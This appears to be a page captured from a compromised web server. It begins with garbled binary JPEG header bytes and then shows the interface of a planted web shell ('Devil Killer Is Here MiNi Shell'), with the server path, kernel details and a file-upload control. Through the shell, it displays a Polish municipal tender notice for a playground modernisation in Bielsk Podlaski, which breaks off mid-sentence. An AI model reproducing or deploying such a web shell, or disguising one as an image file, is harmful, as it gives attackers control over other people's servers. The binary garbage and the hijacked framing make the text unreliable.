JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250729/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250729/0035107801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozwój infrastruktury rekreacyjnej poprzez modernizację placu zabaw w Bielsku Podlaskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO BIELSK PODLASKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050658982</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mikołaja Kopernika 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsk Podlaski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@bielsk-podlaski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bielsk-podlaski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozwój infrastruktury rekreacyjnej poprzez modernizację placu zabaw w Bielsku Podlaskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-207a6ed7-64a1-40d0-99b6-63e5b408ea53</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00351078</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00055884/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Rozwój infrastruktury rekreacyjnej poprzez modernizację placu zabaw w Bielsku Podlaskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/umbielskpodlaski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w formie elektronicznej za pośrednictwem Platformy.<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między Zamawiającym a Wykonawcami, w<br/>tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za pośrednictwem<br/>Platformy i formularza „Wyślij wiadomość do zamawiającego”. Zamawiający będzie przekazywał Wykonawcom informacje w formie<br/>elektronicznej za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu<br/>składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Postępowanie prowadzone jest w<br/>formie elektronicznej za pośrednictwem Platformy pod adresem: https://platformazakupowa.pl/pn/umbielskpodlaski.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na Platformie, tj.:<br/>1.1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>1.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza<br/>wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10 4, Linux lub ich nosze wersje,<br/>1.3. zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>1.4. włączona obsługa JavaScript,<br/>1.5. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>1.6. Szyfrowanie na Platformie odbywa się za pomocą protokołu TLS 1.3.<br/>1.7. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2. Oferta składana jest w formie elektronicznej opatrzonej podpisem kwalifikowanym lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>3. W procesie składania oferty na Platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca<br/>może złożyć bezpośrednio na dokumencie, który następnie przesyła do systemu (opcja rekomendowana przez Platformę) oraz<br/>dodatkowo dla całego pakietu dokumentów w kroku 2 Formularza składania oferty (po kliknięciu w przycisk Przejdź do<br/>podsumowania).<br/>4. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy. Informacje<br/>dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał<br/>na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego Wykonawcy.<br/>Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zostały szczegółowo opisane w Rozdziale 14 i 16 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny RODO szczegółowo opisano w Rozdziale 30 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ograniczenia stosowania RODO szczegółowo opisano w Rozdziale 30 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Izp.271.35.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 – wykonanie robót budowlanych w zakresie zadania pn. “Rozwój infrastruktury rekreacyjnej poprzez modernizację placu zabaw w Bielsku Podlaskim” – zakres robót został szczegółowo określony w dokumentacji projektowo-kosztorysowej, stanowiącej Załącznik nr 7 i Załącznik nr 8 do SWZ.<br/><br/>Zakres zadania w zakresie Części nr 1 obejmuje wykonanie niżej wymienionych robót budowlanych i innych czynności:<br/>1)	Demontaż istniejących urządzeń zabawowych wraz fundamentami oraz demontaż ławek i koszy na śmieci (w celu odnowienia i ponownego montażu).<br/>2)	Rozbiórkę istniejącej nawierzchni wraz z podbudową bez demontażu obrzeży z wyjątkiem tych kolidujących z robotami związanymi z montażem masztów.<br/>3)	Oczyszczenie terenu, wywiezienie odpadów budowlanych oraz ich utylizacja (wraz z istniejącymi zabawkami).<br/>4)	Wykonanie warstw podbudowy.<br/>5)	Wykonanie nawierzchni bezpiecznej wylewanej, odpornej na działanie warunków atmosferycznych, wodoprzepuszczalnej. <br/>6)	Montaż nowych zabawek szczegółowo opisanych w dokumentacji projektowo-kosztorysowej.<br/>7)	Montaż zewnętrznego defibrylatora AED z tablicą informacyjną, skrzynką na apteczkę oraz wyposażeniem AED na fundamencie zewnętrznym. <br/>8)	Wykonanie stóp fundamentowych do masztów wraz z izolacją przeciwwilgociową.<br/>9)	Montaż masztów z konstrukcji stalowej ocynkowanej z kształtowników walcowanych z rur okrągłych.<br/>10)	Montaż żagli przeciwsłonecznych ze wzmocnionymi krawędziami oraz płytkami aluminiowymi w narożnikach wraz z osprzętem niezbędnym do montażu (liny, śruby rzymskiej itp.). <br/>11)	Odtworzenie obrzeży.<br/>12)	Wykonanie nasadzeń z 4 drzew wiśni osobliwej.<br/>13)	Wykonanie utwardzeń z kostki betonowej.<br/>14)	Montaż 2 stojaków na rowery z utwardzaniem z kostki betonowej.<br/>15)	Odmalowanie istniejących ławek i koszy.<br/>16)	Rewitalizację trenów zielonych.<br/>Teren realizacji robót budowlanych znajduje się w strefie objętej ochroną konserwatorską. W przypadku konieczności uzyskania pozwoleń lub uzgodnień z organami ochrony zabytków, Wykonawca zobowiązuje się do ich uzyskania we współpracy z Zamawiającym, o ile nie zostały zapewnione przez dokumentację projektową. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>W zakresie Części 1:<br/>(C) Cena – 60%<br/>(G) Okres gwarancji i rękojmi – 40%<br/><br/>1)	Kryterium „Cena” (C):<br/>Kryterium „Cena (C)” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia podanej przez Wykonawcę w formularzu ofertowym. <br/>Zamawiający ofercie o najniższej cenie spośród ofert ocenianych przyzna 60 punktów,<br/>a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>C = ( Cmin / Cb ) x 60%<br/>gdzie:<br/>C – ilość punktów przyznana w kryterium „Cena” <br/>Cmin – najniższa cena w złożonych ofertach <br/>Cb – cena badanej oferty<br/>60% – procentowe znaczenie kryterium „Cena”<br/>Oferta w kryterium „Cena” może otrzymać maksymalnie 60 punktów.<br/><br/>2)	Kryterium „Okres gwarancji i rękojmi” (G):<br/>W kryterium „Okres gwarancji” (G) Zamawiający przyjmuje do oceny okres gwarancji wskazany przez Wykonawcę w formularzu oferty i wyrażony w miesiącach:<br/>Okres gwarancji i rękojmi	Liczna punktów<br/>36 miesięcy 0 pkt.<br/>48 miesięcy 20 pkt.<br/>60 miesięcy 40 pkt.<br/>Najniższy możliwy do zaoferowania okres gwarancji i rękojmi jaki Wykonawca może przedstawić Zamawiającemu stanowi okres 36 miesięcy. <br/>Wykonawca zobowiązany jest w formularzu ofertowym określić okres gwarancji i rękojmi w miesiącach w zakresie 36 / 48 / 60 miesięcy. <br/>Jeżeli Wykonawca wskaże okres gwarancji krótszy niż 36 miesięcy lub gdy Wykonawca nie wskaże okresu gwarancji oferta Wykonawcy podlegać będzie odrzuceniu na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>Jeżeli Wykonawca wskaże okres gwarancji dłuższy niż 60 miesięcy, w celu obliczenia punktacji w niniejszym kryterium zostanie przyjęty okres 60 miesięcy. <br/>Oferta w kryterium „Okres gwarancji” (G) może otrzymać maksymalnie 40 punktów.<br/><br/><br/>Łączna punktacja oferty w zakresie Części 1 będzie obliczana jako suma punktów uzyskanych w obu kryteriach, zgodnie ze wzorem:<br/>P = C + G<br/>gdzie:<br/>P – łączna liczba punktów,<br/>C – liczba punktów za kryterium „Cena”,<br/>G – liczba punktów za kryterium „Okres gwarancji i rękojmi”<br/>Maksymalna ilość punktów do otrzymania w zakresie Części 1 – 100,00 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 – Pełnienie nadzoru inwestorskiego nad realizacją inwestycji pn. “Rozwój infrastruktury rekreacyjnej poprzez modernizację placu zabaw w Bielsku Podlaskim” w pełnym zakresie czynności określonych w przepisach ustawy z dnia 7 lipca 1994 r. Prawo budowlane. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71700000-5 - Usługi nadzoru i kontroli</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>W zakresie Części 2:<br/>(C) Cena – 80%<br/>(D) Doświadczenie inspektora branży konstrukcyjno-budowlanej – 20%<br/><br/>1)	Kryterium „Cena (C)” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia podanej przez Wykonawcę w formularzu ofertowym.<br/>Zamawiający ofercie o najniższej cenie spośród ofert ocenianych przyzna 80 punktów,<br/>a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>C = ( Cmin / Cb ) x 80%<br/>gdzie:<br/>C – ilość punktów przyznana w kryterium „Cena” <br/>Cmin – najniższa cena w złożonych ofertach <br/>Cb – cena badanej oferty<br/>80% - procentowe znaczenie kryterium „Cena”<br/>Oferta w kryterium „Cena” może otrzymać maksymalnie 80 punktów.<br/><br/>2)	Kryterium „Doświadczenie inspektora branży konstrukcyjno-budowlanej (D)” dotyczy doświadczenia osoby skierowanej do realizacji zamówienia do pełnienia funkcji inspektora nadzoru, przy realizacji robót budowlanych polegających na budowie, przebudowie lub modernizacji obiektów budowlanych zlokalizowanych w przestrzeni publicznej, zrealizowanych w ciągu ostatnich 5 lat. <br/>Za „obiekty budowlane zlokalizowane w przestrzeni publicznej” uznaje się w szczególności: budynki użyteczności publicznej, obiekty rekreacyjne, sportowe, place zabaw, tereny zieleni, parki miejskie oraz inne ogólnodostępne obiekty przeznaczone do zbiorowego korzystania przez użytkowników.<br/>Zamawiający przyzna punkty za liczbę zakończonych inwestycji nadzorowanych przez wskazaną osobę w ciągu ostatnich 5 lat:<br/><br/>Liczba inwestycji zakończonych	Liczna punktów<br/>1 inwestycja 0 pkt.<br/>2 inwestycje 10 pkt.<br/>3 inwestycje 20 pkt.<br/><br/>Warunkiem uzyskania punktów jest wykazanie inwestycji zakończonych. Przez zakończoną inwestycję rozumiesz inwestycję odebraną protokołem odbioru końcowego lub równoważnym dokumentem. <br/>W formularzu ofertowym Wykonawca wskaże: imię i nazwisko inspektora, nazwę i numer uprawnień budowlanych, nazwę inwestycji, rodzaj obiektu, nazwę podmiotu, na rzecz którego inwestycja została wykonana, pełnioną funkcję (np. inspektor nadzoru), datę realizacji inwestycji, krótki opis zakresu robót objętych nadzorem.<br/>Oferta w kryterium „Doświadczenie inspektora branży konstrukcyjno-budowlanej” może otrzymać maksymalnie 20 pkt.<br/><br/>Łączna punktacja oferty w zakresie Części 2 będzie obliczana jako suma punktów uzyskanych w obu kryteriach, zgodnie ze wzorem:<br/><br/>P = C + D<br/>gdzie:<br/>P – łączna liczba punktów,<br/>C – liczba punktów za kryterium „Cena”<br/>D – liczba punktów za kryterium „Doświadczenie inspektora branży konstrukcyjno-budowlanej”<br/>Maksymalna ilość punktów do otrzymania w zakresie Części 2 – 100,00 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora branży konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące<br/>zdolności technicznej lub zawodowej.<br/>1) W celu potwierdzenia warunku w zakresie Części nr 1 Wykonawca winien wykazać:<br/>a)	dysponowanie osobą, którą skieruje do realizacji zamówienia publicznego posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej.<br/>b)	wykonanie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – co najmniej 1 roboty budowlanej polegającej na wykonaniu nawierzchni wylewanej z granulatu gumowego typu SBR i EPDM o powierzchni 